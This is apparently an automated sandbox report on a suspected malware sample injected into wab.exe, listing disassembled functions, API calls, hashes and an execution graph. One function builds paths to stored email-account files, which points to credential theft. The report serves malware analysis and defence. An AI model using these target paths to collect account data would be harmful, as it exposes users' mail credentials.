                                      • Instruction ID: bdfaf49ded56e23490e4c224f0dd951688bdd2fa87c0c0bb02fc8fb97e762344
                                      • Opcode Fuzzy Hash: 1b7732db8463f3c3abc0b3e33ceb3537dbecbf66044d23129268eaf9bd19010c
                                      • Instruction Fuzzy Hash: C701B53360DF115EA2182BF97CC6A4A2696EF5D679B200329F5116D0E1EF294CC5A250
                                      APIs
                                      • GetLastError.KERNEL32(?,?,20EA6C6C), ref: 20EA5AFA
                                      • _free.LIBCMT ref: 20EA5B2D
                                      • _free.LIBCMT ref: 20EA5B55
                                      • SetLastError.KERNEL32(00000000,?,?,20EA6C6C), ref: 20EA5B62
                                      • SetLastError.KERNEL32(00000000,?,?,20EA6C6C), ref: 20EA5B6E
                                      • _abort.LIBCMT ref: 20EA5B74
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: d6d487f86ff3d4c791dcdf7ddc2dadfbc36ee35f537a4a694ea720345d1273ea
                                      • Instruction ID: f435f0dd56ff77650e3415e83459ef25464cb2274c0440ea908681cf6610eb5f
                                      • Opcode Fuzzy Hash: d6d487f86ff3d4c791dcdf7ddc2dadfbc36ee35f537a4a694ea720345d1273ea
                                      • Instruction Fuzzy Hash: B4F0A973548E00BAC20623F45C4AF0E26AAAFED576F250115F916BE1A1EE288DC65174
                                      APIs
                                        • Part of subcall function 20EA1E89: lstrlenW.KERNEL32(?,?,?,?,?,20EA10DF,?,?,?,00000000), ref: 20EA1E9A
                                        • Part of subcall function 20EA1E89: lstrcatW.KERNEL32(?,?), ref: 20EA1EAC
                                        • Part of subcall function 20EA1E89: lstrlenW.KERNEL32(?,?,20EA10DF,?,?,?,00000000), ref: 20EA1EB3
                                        • Part of subcall function 20EA1E89: lstrlenW.KERNEL32(?,?,20EA10DF,?,?,?,00000000), ref: 20EA1EC8
                                        • Part of subcall function 20EA1E89: lstrcatW.KERNEL32(?,20EA10DF), ref: 20EA1ED3
                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 20EA122A
                                        • Part of subcall function 20EA173A: _strlen.LIBCMT ref: 20EA1855
                                        • Part of subcall function 20EA173A: _strlen.LIBCMT ref: 20EA1869
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                      • API String ID: 4036392271-1520055953
                                      • Opcode ID: 2cde4a361869aa3b2f538abfaeba583a3b209bc08356538619202765ec006b0e
                                      • Instruction ID: b6c599d901aa3b0e0edd850d5916f4c50aa922dbc78fa38bdde73b1cf52a61b4
                                      • Opcode Fuzzy Hash: 2cde4a361869aa3b2f538abfaeba583a3b209bc08356538619202765ec006b0e
                                      • Instruction Fuzzy Hash: E0218069A10208AAEB1097E4ECC2BEE737AEF94724F100596F604BB1D0E6B15DC48759
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,20EA4AEA,?,?,20EA4A8A,?,20EB2238,?,20EA4BBD,00000000,00000000), ref: 20EA4B59
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 20EA4B6C
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,20EA4AEA,?,?,20EA4A8A,?,20EB2238,?,20EA4BBD,00000000,00000000,00000001,20EA2082), ref: 20EA4B8F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: dea1d7efb650246242188589accdeb9419a8e579dd9eeb9fdfa95e686534e3d2
                                      • Instruction ID: 840833cfd2bdae2ff9af186fcd1b4ba0011cf9da6386b59271fbac2b5f1b6415
                                      • Opcode Fuzzy Hash: dea1d7efb650246242188589accdeb9419a8e579dd9eeb9fdfa95e686534e3d2
                                      • Instruction Fuzzy Hash: 28F03172908608AFDB119FA0CC49B9D7FBAEF4C255F004164F907AA160DF3499D5DA60
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 20EA715C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 20EA717F
                                        • Part of subcall function 20EA56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 20EA5702
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 20EA71A5
                                      • _free.LIBCMT ref: 20EA71B8
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 20EA71C7
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 3aa953fe7bd72dfa286df42dad1671d4d0debb6cc26a9345dbb3707e16f33d77
                                      • Instruction ID: 3321afc828ac66cd94324b18319140e9953d20736b0bc1f2be74cc641bdb19d4
                                      • Opcode Fuzzy Hash: 3aa953fe7bd72dfa286df42dad1671d4d0debb6cc26a9345dbb3707e16f33d77
                                      • Instruction Fuzzy Hash: 2901D47360B6257F23118BF64C9AD7F2EEEDFDE9A47110129BD45DB200EE648C8291B0
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000000,20EA636D,20EA5713,00000000,?,20EA2249,?,?,20EA1D66,00000000,?,?,00000000), ref: 20EA5B7F
                                      • _free.LIBCMT ref: 20EA5BB4
                                      • _free.LIBCMT ref: 20EA5BDB
                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20EA5BE8
                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20EA5BF1
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 199cfb92802fe08495be0d6c5b4bb63e39ebfe00858bc68bb8ff25bb09cadabe
                                      • Instruction ID: 2b09f19c6e0d68fe03313185ce9ab6204badba845823a833f5de84378b65fc77
                                      • Opcode Fuzzy Hash: 199cfb92802fe08495be0d6c5b4bb63e39ebfe00858bc68bb8ff25bb09cadabe
                                      • Instruction Fuzzy Hash: 1F01F973149E01AB820257F41CC5E0F2AAAAFDD5767210115F817BE162EE28CDCA5130
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,?,?,20EA10DF,?,?,?,00000000), ref: 20EA1E9A
                                      • lstrcatW.KERNEL32(?,?), ref: 20EA1EAC
                                      • lstrlenW.KERNEL32(?,?,20EA10DF,?,?,?,00000000), ref: 20EA1EB3
                                      • lstrlenW.KERNEL32(?,?,20EA10DF,?,?,?,00000000), ref: 20EA1EC8
                                      • lstrcatW.KERNEL32(?,20EA10DF), ref: 20EA1ED3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: lstrlen$lstrcat
                                      • String ID:
                                      • API String ID: 493641738-0
                                      • Opcode ID: b76154c183b1f8b83f900cc8eb77b183720ff0b78692799d48d8c96ffd4d6746
                                      • Instruction ID: fb19d5d79c10f6a0b07066a0a18d2a9c5abc7080904bd72da94453f35ae733f7
                                      • Opcode Fuzzy Hash: b76154c183b1f8b83f900cc8eb77b183720ff0b78692799d48d8c96ffd4d6746
                                      • Instruction Fuzzy Hash: 36F0E2271042147ED221276AACC5EBFBB7DEFCAB20F004019FA09971909B58588292B5
                                      APIs
                                      • _free.LIBCMT ref: 20EA91D0
                                        • Part of subcall function 20EA571E: HeapFree.KERNEL32(00000000,00000000,?,20EA924F,?,00000000,?,00000000,?,20EA9276,?,00000007,?,?,20EA7E5A,?), ref: 20EA5734
                                        • Part of subcall function 20EA571E: GetLastError.KERNEL32(?,?,20EA924F,?,00000000,?,00000000,?,20EA9276,?,00000007,?,?,20EA7E5A,?,?), ref: 20EA5746
                                      • _free.LIBCMT ref: 20EA91E2
                                      • _free.LIBCMT ref: 20EA91F4
                                      • _free.LIBCMT ref: 20EA9206
                                      • _free.LIBCMT ref: 20EA9218
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 6c9b93b5cef8cfe36f37a300848fc12c5650a400e63d5695995ce58f41cc4fd6
                                      • Instruction ID: 78ba904e335a236a16ee71c97802f179e5109ecb7d4a040e628cd9c068e530e4
                                      • Opcode Fuzzy Hash: 6c9b93b5cef8cfe36f37a300848fc12c5650a400e63d5695995ce58f41cc4fd6
                                      • Instruction Fuzzy Hash: 6FF0FFB3519651AB8614DBE4EAC6D167BD9FB386147A10807F94AEF520CA34FCC08A60
                                      APIs
                                      • _free.LIBCMT ref: 20EA536F
                                        • Part of subcall function 20EA571E: HeapFree.KERNEL32(00000000,00000000,?,20EA924F,?,00000000,?,00000000,?,20EA9276,?,00000007,?,?,20EA7E5A,?), ref: 20EA5734
                                        • Part of subcall function 20EA571E: GetLastError.KERNEL32(?,?,20EA924F,?,00000000,?,00000000,?,20EA9276,?,00000007,?,?,20EA7E5A,?,?), ref: 20EA5746
                                      • _free.LIBCMT ref: 20EA5381
                                      • _free.LIBCMT ref: 20EA5394
                                      • _free.LIBCMT ref: 20EA53A5
                                      • _free.LIBCMT ref: 20EA53B6
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 1924281bb7c306244310b88ac675ba50bb858219514e3e473054c05441d83872
                                      • Instruction ID: 59669a662b9d37bde65a6fb5b5f7ac832a97ea98e75687b5ba26cfe471516c4c
                                      • Opcode Fuzzy Hash: 1924281bb7c306244310b88ac675ba50bb858219514e3e473054c05441d83872
                                      • Instruction Fuzzy Hash: F5F030B3D1E920DF8A195F789DC34583BF1BB2C654341030AF912BB274D73908C9AB90
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 20EA4C1D
                                      • _free.LIBCMT ref: 20EA4CE8
                                      • _free.LIBCMT ref: 20EA4CF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                      • API String ID: 2506810119-3377118234
                                      • Opcode ID: c66faf8cf1f2a2dc3de9a5b5abfa60ca007c3ccd3e4b18e5f8867da58189e06c
                                      • Instruction ID: 2095655101202a8b3f17b3bb4884b93c652eb9db1ae6d834495e696723a8a092
                                      • Opcode Fuzzy Hash: c66faf8cf1f2a2dc3de9a5b5abfa60ca007c3ccd3e4b18e5f8867da58189e06c
                                      • Instruction Fuzzy Hash: BE3193B1A05618EFDB12CBE58881E9EBBF8EFCD324B104066F905AB210D6748EC5DB50
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,20EA6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 20EA8731
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 20EA87BA
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 20EA87CC
                                      • __freea.LIBCMT ref: 20EA87D5
                                        • Part of subcall function 20EA56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 20EA5702
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: 41b6f2d2ad138ab1114f4d45843b5f9ebd5bca95fdae0b6cd2f51a3010a16e1b
                                      • Instruction ID: 2e31c64c30e8350000b066e5c590d2223856109c8f3a3309bbef56629d12dd5e
                                      • Opcode Fuzzy Hash: 41b6f2d2ad138ab1114f4d45843b5f9ebd5bca95fdae0b6cd2f51a3010a16e1b
                                      • Instruction Fuzzy Hash: F631AE32A0021AAFDF158FA4CC85EAF7BA5EF48214F210169FD15EA550EB39DD94CB90
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,20EA1D66,00000000,00000000,?,20EA5C88,20EA1D66,00000000,00000000,00000000,?,20EA5E85,00000006,FlsSetValue), ref: 20EA5D13
                                      • GetLastError.KERNEL32(?,20EA5C88,20EA1D66,00000000,00000000,00000000,?,20EA5E85,00000006,FlsSetValue,20EAE190,FlsSetValue,00000000,00000364,?,20EA5BC8), ref: 20EA5D1F
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,20EA5C88,20EA1D66,00000000,00000000,00000000,?,20EA5E85,00000006,FlsSetValue,20EAE190,FlsSetValue,00000000), ref: 20EA5D2D
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: 346f47314ab97abb57354a3c50400064276abac00d253c6f8b81695ea9fd0347
                                      • Instruction ID: 212b1ccf4191e6788c3996248e272107a119cc889bdcf41e8bcd65b6bc6ca3cf
                                      • Opcode Fuzzy Hash: 346f47314ab97abb57354a3c50400064276abac00d253c6f8b81695ea9fd0347
                                      • Instruction Fuzzy Hash: 5F01FC376096226FC3114BB88C8CE8B7759AF0D7B5B100620F907DB150DB34D8C5C6D0
                                      APIs
                                      • _free.LIBCMT ref: 20EA655C
                                        • Part of subcall function 20EA62BC: IsProcessorFeaturePresent.KERNEL32(00000017,20EA62AB,00000000,?,?,?,?,00000016,?,?,20EA62B8,00000000,00000000,00000000,00000000,00000000), ref: 20EA62BE
                                        • Part of subcall function 20EA62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 20EA62E0
                                        • Part of subcall function 20EA62BC: TerminateProcess.KERNEL32(00000000), ref: 20EA62E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                      • String ID: *?$.
                                      • API String ID: 2667617558-3972193922
                                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                      • Instruction ID: d746dcc9748927a89bbb10e4d625a26c1981b571856a4d745c9fd4aedebc109d
                                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                      • Instruction Fuzzy Hash: 755192B5E002099FDB04CFE8C881AADBBF5FF9D318F248169E854EB345E6359E418B50
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: : $Se.
                                      • API String ID: 4218353326-4089948878
                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                      • Instruction ID: 04af833f80a4eb2491cae09365af3de2cf0687478e062e5b173c902fef7b9ae0
                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                      • Instruction Fuzzy Hash: B111C1B1900248AFCB10DFE89841BDEFBFCAF1D204F10509AE545EB212E6705A428B65
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 20EA2903
                                        • Part of subcall function 20EA35D2: RaiseException.KERNEL32(?,?,?,20EA2925,00000000,00000000,00000000,?,?,?,?,?,20EA2925,?,20EB21B8), ref: 20EA3632
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 20EA2920
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$ExceptionRaise
                                      • String ID: Unknown exception
                                      • API String ID: 3476068407-410509341
                                      • Opcode ID: 1aa5475f1effaed1e342e80b6f430cdbc7c40e71eaf4d80cc9f048db1decbd05
                                      • Instruction ID: fd2353ef2db0a7736f9005871538c22f4295be9e751216924ece568bf9aaf53b
                                      • Opcode Fuzzy Hash: 1aa5475f1effaed1e342e80b6f430cdbc7c40e71eaf4d80cc9f048db1decbd05
                                      • Instruction Fuzzy Hash: 68F0F43490420C738B04A6ECEC86B9D73AC6F1C654F708179BA14BE0A0EB35EEE58590
                                      APIs
                                      • GetOEMCP.KERNEL32(00000000,?,?,20EA6C7C,?), ref: 20EA6A1E
                                      • GetACP.KERNEL32(00000000,?,?,20EA6C7C,?), ref: 20EA6A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: |l
                                      • API String ID: 0-3153849899
                                      • Opcode ID: 6880fd3f117708838e51c8399556cf52db6b24f9af1729cf558f4052d17fdef1
                                      • Instruction ID: a8b610f5c5e8190a0790655aa6155487e8988ca462256ce294260bc6e88f38a6
                                      • Opcode Fuzzy Hash: 6880fd3f117708838e51c8399556cf52db6b24f9af1729cf558f4052d17fdef1
                                      • Instruction Fuzzy Hash: 07F03C72908509CFD704DBB4C8897AC77B1BB09339F144344E53A9A2E1DB7959C99B41

                                      Execution Graph

                                      Execution Coverage:6.1%
                                      Dynamic/Decrypted Code Coverage:9.2%
                                      Signature Coverage:1.5%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:74
                                      execution_graph 40328 441819 40331 430737 40328->40331 40330 441825 40332 430756 40331->40332 40344 43076d 40331->40344 40333 430774 40332->40333 40334 43075f 40332->40334 40346 43034a memcpy 40333->40346 40345 4169a7 11 API calls 40334->40345 40337 4307ce 40338 430819 memset 40337->40338 40347 415b2c 11 API calls 40337->40347 40338->40344 40339 43077e 40339->40337 40342 4307fa 40339->40342 40339->40344 40341 4307e9 40341->40338 40341->40344 40348 4169a7 11 API calls 40342->40348 40344->40330 40345->40344 40346->40339 40347->40341 40348->40344 37671 442ec6 19 API calls 37848 4152c6 malloc 37849 4152e2 37848->37849 37850 4152ef 37848->37850 37852 416760 11 API calls 37850->37852 37852->37849 37853 4466f4 37872 446904 37853->37872 37855 446700 GetModuleHandleA 37858 446710 __set_app_type __p__fmode __p__commode 37855->37858 37857 4467a4 37859 4467ac __setusermatherr 37857->37859 37860 4467b8 37857->37860 37858->37857 37859->37860 37873 4468f0 _controlfp 37860->37873 37862 4467bd _initterm __wgetmainargs _initterm 37864 44681e GetStartupInfoW 37862->37864 37865 446810 37862->37865 37866 446866 GetModuleHandleA 37864->37866 37874 41276d 37866->37874 37870 446896 exit 37871 44689d _cexit 37870->37871 37871->37865 37872->37855 37873->37862 37875 41277d 37874->37875 37917 4044a4 LoadLibraryW 37875->37917 37877 412785 37909 412789 37877->37909 37925 414b81 37877->37925 37880 4127c8 37931 412465 memset ??2@YAPAXI 37880->37931 37882 4127ea 37943 40ac21 37882->37943 37887 412813 37961 40dd07 memset 37887->37961 37888 412827 37966 40db69 memset 37888->37966 37891 412822 37987 4125b6 ??3@YAXPAX 37891->37987 37893 40ada2 _wcsicmp 37894 41283d 37893->37894 37894->37891 37897 412863 CoInitialize 37894->37897 37971 41268e 37894->37971 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37897->37991 37901 41296f 37993 40b633 37901->37993 37904 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37908 412957 37904->37908 37914 4128ca 37904->37914 37908->37891 37909->37870 37909->37871 37910 4128d0 TranslateAcceleratorW 37911 412941 GetMessageW 37910->37911 37910->37914 37911->37908 37911->37910 37912 412909 IsDialogMessageW 37912->37911 37912->37914 37913 4128fd IsDialogMessageW 37913->37911 37913->37912 37914->37910 37914->37912 37914->37913 37915 41292b TranslateMessage DispatchMessageW 37914->37915 37916 41291f IsDialogMessageW 37914->37916 37915->37911 37916->37911 37916->37915 37918 4044cf GetProcAddress 37917->37918 37921 4044f7 37917->37921 37919 4044e8 FreeLibrary 37918->37919 37922 4044df 37918->37922 37920 4044f3 37919->37920 37919->37921 37920->37921 37923 404507 MessageBoxW 37921->37923 37924 40451e 37921->37924 37922->37919 37923->37877 37924->37877 37926 414b8a 37925->37926 37927 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37925->37927 37997 40a804 memset 37926->37997 37927->37880 37930 414b9e GetProcAddress 37930->37927 37932 4124e0 37931->37932 37933 412505 ??2@YAPAXI 37932->37933 37934 41251c 37933->37934 37936 412521 37933->37936 38019 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37934->38019 38008 444722 37936->38008 37942 41259b wcscpy 37942->37882 38024 40b1ab ??3@YAXPAX ??3@YAXPAX 37943->38024 37947 40ad4b 37956 40ad76 37947->37956 38048 40a9ce 37947->38048 37948 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37950 40ac5c 37948->37950 37950->37947 37950->37948 37951 40ace7 ??3@YAXPAX 37950->37951 37950->37956 38028 40a8d0 37950->38028 38040 4099f4 37950->38040 37951->37950 37955 40a8d0 7 API calls 37955->37956 38025 40aa04 37956->38025 37957 40ada2 37958 40adc9 37957->37958 37959 40adaa 37957->37959 37958->37887 37958->37888 37959->37958 37960 40adb3 _wcsicmp 37959->37960 37960->37958 37960->37959 38053 40dce0 37961->38053 37963 40dd3a GetModuleHandleW 38058 40dba7 37963->38058 37967 40dce0 3 API calls 37966->37967 37968 40db99 37967->37968 38130 40dae1 37968->38130 38144 402f3a 37971->38144 37973 412766 37973->37891 37973->37897 37974 4126d3 _wcsicmp 37975 4126a8 37974->37975 37975->37973 37975->37974 37977 41270a 37975->37977 38178 4125f8 7 API calls 37975->38178 37977->37973 38147 411ac5 37977->38147 37988 4125da 37987->37988 37989 4125f0 37988->37989 37990 4125e6 DeleteObject 37988->37990 37992 40b1ab ??3@YAXPAX ??3@YAXPAX 37989->37992 37990->37989 37991->37904 37992->37901 37994 40b640 37993->37994 37995 40b639 ??3@YAXPAX 37993->37995 37996 40b1ab ??3@YAXPAX ??3@YAXPAX 37994->37996 37995->37994 37996->37909 37998 40a83b GetSystemDirectoryW 37997->37998 37999 40a84c wcscpy 37997->37999 37998->37999 38004 409719 wcslen 37999->38004 38002 40a881 LoadLibraryW 38003 40a886 38002->38003 38003->37927 38003->37930 38005 409724 38004->38005 38006 409739 wcscat LoadLibraryW 38004->38006 38005->38006 38007 40972c wcscat 38005->38007 38006->38002 38006->38003 38007->38006 38009 444732 38008->38009 38010 444728 DeleteObject 38008->38010 38020 409cc3 38009->38020 38010->38009 38012 412551 38013 4010f9 38012->38013 38014 401130 38013->38014 38015 401134 GetModuleHandleW LoadIconW 38014->38015 38016 401107 wcsncat 38014->38016 38017 40a7be 38015->38017 38016->38014 38018 40a7d2 38017->38018 38018->37942 38018->38018 38019->37936 38023 409bfd memset wcscpy 38020->38023 38022 409cdb CreateFontIndirectW 38022->38012 38023->38022 38024->37950 